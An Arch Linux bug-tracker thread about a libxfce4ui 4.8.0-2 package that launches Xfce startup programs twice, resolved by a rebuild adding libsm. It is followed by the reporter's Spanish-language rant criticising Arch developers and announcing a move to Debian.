Comment by synflag (synflag) - Thursday, 19 May 2011, 00:21 GMT-3 Edit
Zhehao,

Yes, same error, i'am tired with bug over bug, packages no tested.
To Downgrade, go to /var/cache/pacman/pkg/ and find the package libxfce4ui-4.8.0-1.pkg.tar.xz with ls -l, then, execute pacman -U libxfce4ui-4.8.0-1.pkg.tar.xz, and after edit /etc/pacman.conf add ignorepkg = libxfce4ui and write, for not affect your system with news upgrades (pacman -Syu).

Reegards.
Comment by Andreas Radke (AndyRTR) - Thursday, 19 May 2011, 02:57 GMT-3
The pkg is just a rebuild removing the Xfce4 group. I've also noticed the somewhat longer time until the desktop was fully loaded. But I see no error so far.

I assume gcc4.6 producing bad code here. Assigning also to Allan for a possible compiler bug.
Comment by Rémy Oudompheng (remyoudompheng) - Thursday, 19 May 2011, 03:30 GMT-3
synflag: hello I cannot reproduce this problem. Please post the complete output of startx, in an attached file. Thank you. You must give enough information so that we know which program is crashing.
Also please mention any package related to XFCE that you may have installed from AUR.
Comment by Leonid Isaev (lisaev) - Thursday, 19 May 2011, 11:25 GMT-3
Also, do you have any gtk3 themes in use?
Comment by Zhehao Mao (zhehao) - Thursday, 19 May 2011, 11:59 GMT-3
I've attached the startx readout for libxfce4ui version 2 and version 1 in startx.log and startx-old.log respectively. It seems that the problem is that version 2 is causing multiple instances of the startup programs to be run when only one should be. Version 1 does not have this problem, as the logs show.
Comment by Rémy Oudompheng (remyoudompheng) - Thursday, 19 May 2011, 15:07 GMT-3
zhehao: can you post the contents of your .xinitrc file? is your system completely up to date?
Comment by Zhehao Mao (zhehao) - Thursday, 19 May 2011, 15:42 GMT-3
My system is completely up to date, but for now I have downgraded libxfce4ui so as to avoid the bug. Here is my .xinitrc. It sources the files in /etc/X11/xinit/xinitrc.d/. I have attached those as well.
Comment by Rémy Oudompheng (remyoudompheng) - Thursday, 19 May 2011, 15:50 GMT-3
I'm not sure the usage of startxfce4 in .initrc is correct: both of your logs show multiple launches of the same thing. Can you try replacing startxfce4 by xfce4-session in your .xinitrc file ?
Comment by Leonid Isaev (lisaev) - Thursday, 19 May 2011, 16:04 GMT-3
OK, what is it with people and dbus?
1. /usr/bin/startxfce4 already calls dbus-launch, so it should be disabled in .xinitrc.
2. Similarly, 30-dbus is not needed.

Using xfce4-session instead of startxfce4 will disable automount, trash and possibly the root menu.
Comment by Zhehao Mao (zhehao) - Thursday, 19 May 2011, 19:26 GMT-3
Leonid, after commenting out everything in .xinitrc except for exec startxfce4, the problem persists. Remy, I'm pretty sure the log when running the old version of libxfce4ui (startx-old.log) does not show multiple launches of the same program.
Comment by Evangelos Foutras (foutrelis) - Friday, 20 May 2011, 03:32 GMT-3
I can't replicate OP's bug, but I did notice a change in behavior in 4.8.0-2. Previously, I would press Alt+F4 on the desktop to bring up the log out menu. After updating to 4.8.0-2, Alt+F4 does nothing anymore.

It appears that 4.8.0-2's libxfce4kbd-private-2.so.0.0.0 and libxfce4ui-1.so.0.0.0 are not linked against libSM, and while building in a chroot you can see that it reports "X11 session management: no" after the configure step.

Long story short, adding 'libsm' to the dependencies and rebuilding brings back the "Alt+F4 on the desktop -> Log out menu" functionality for me.

Maybe it fixes this bug too? You can test with the following packages:

(packages removed, use 4.8.0-3 from [extra])
Comment by Andreas Radke (AndyRTR) - Friday, 20 May 2011, 03:50 GMT-3
libxfce4ui 4.8.0-3 in extra has libsm dependency added. please check if this solves the reported problems.
Comment by Daniel (prizeloser) - Friday, 20 May 2011, 05:24 GMT-3
4.8.0-3 gets rid of the bug for me.
Notese en toda ocasion la incompetencia y la falta de voluntad para el caso, digo yo, si van a hacer las cosas de mala gana o sin ella, no es mejor dejarselo a quien si las tenga?.
Bueno, no voy a poner el resto que son como 4 mas, pero todo en el breve lapso de unos meses, he llegado a usar Slackware current, incluso Ubuntu (total basura) me dio menos problemas en su breve uso.
Tampoco son probados los kernel, la ultima version 2.6.38.6 cada una cantidad de veces no exacta da kernel panic. Buscando, cosa que ellos _no_ hacen, encontre que le llaman regresion en el kernel respecto a los procesadores AMD de la clase Athlon, pero claro, ellos no leen lkml. Digo yo, no haria mejor trabajo la comunidad, que esta manga de estupidos que solo piensan en llenar su Curriculum de Linkedin?.
Por esto y mucho mas, es que hoy instalare Debian 6, y vere como va, por lo que me han dicho tengo buenas referencias, ya probe Slackware pero no siempre anda como como debiera respecto a los Slackbuild, si bien me gusta jugar con el sistema, tambien debo trabajar con el.
Si buscan el bugtracker, veran que incluso entre los mismos developers se reportan cosas y se contestan la razon para cerrarlo "works for me". Bueno, basta ver lo que le dice Ionut Biru en mi bug-post, es evidente que ni entre ellos hay afinidad ni misma cantidad de conocimiento, muchos estan sobre valorizados y muchos otros poco valorados como es el caso de Ionut Biru (alias "wonder"), y otros que ni aparecen, como Dan Mcgee quien esta a toda maquina con pacman 3.6 y firmas gpg, pero nadie le da relevancia; deberia ser el jefe de proyecto, y no Aaron, que no lo he visto hacer nada, ni un solo paquete lleva su nombre. Incluso en los mail list se ve que las decisiones las toma Tom Gundersen y los que hacen el kernel y los script de inicio, sera eso lo que pasa con archlinux?, Aaron esta lejos del proyecto y todo se descarrio?, no lo se, ni me lo contestaran, pero no voy a averiguarlo, esto me canso, basta para mi.
Comentarios, agradecimientos, puteadas, experiencias personales, preguntas son bienvenidas, sin miedo, saludos.

Una imagen vale mas que mil palabras, Andreas.... en general cada uno que me hizo poner nervioso... les digo esto: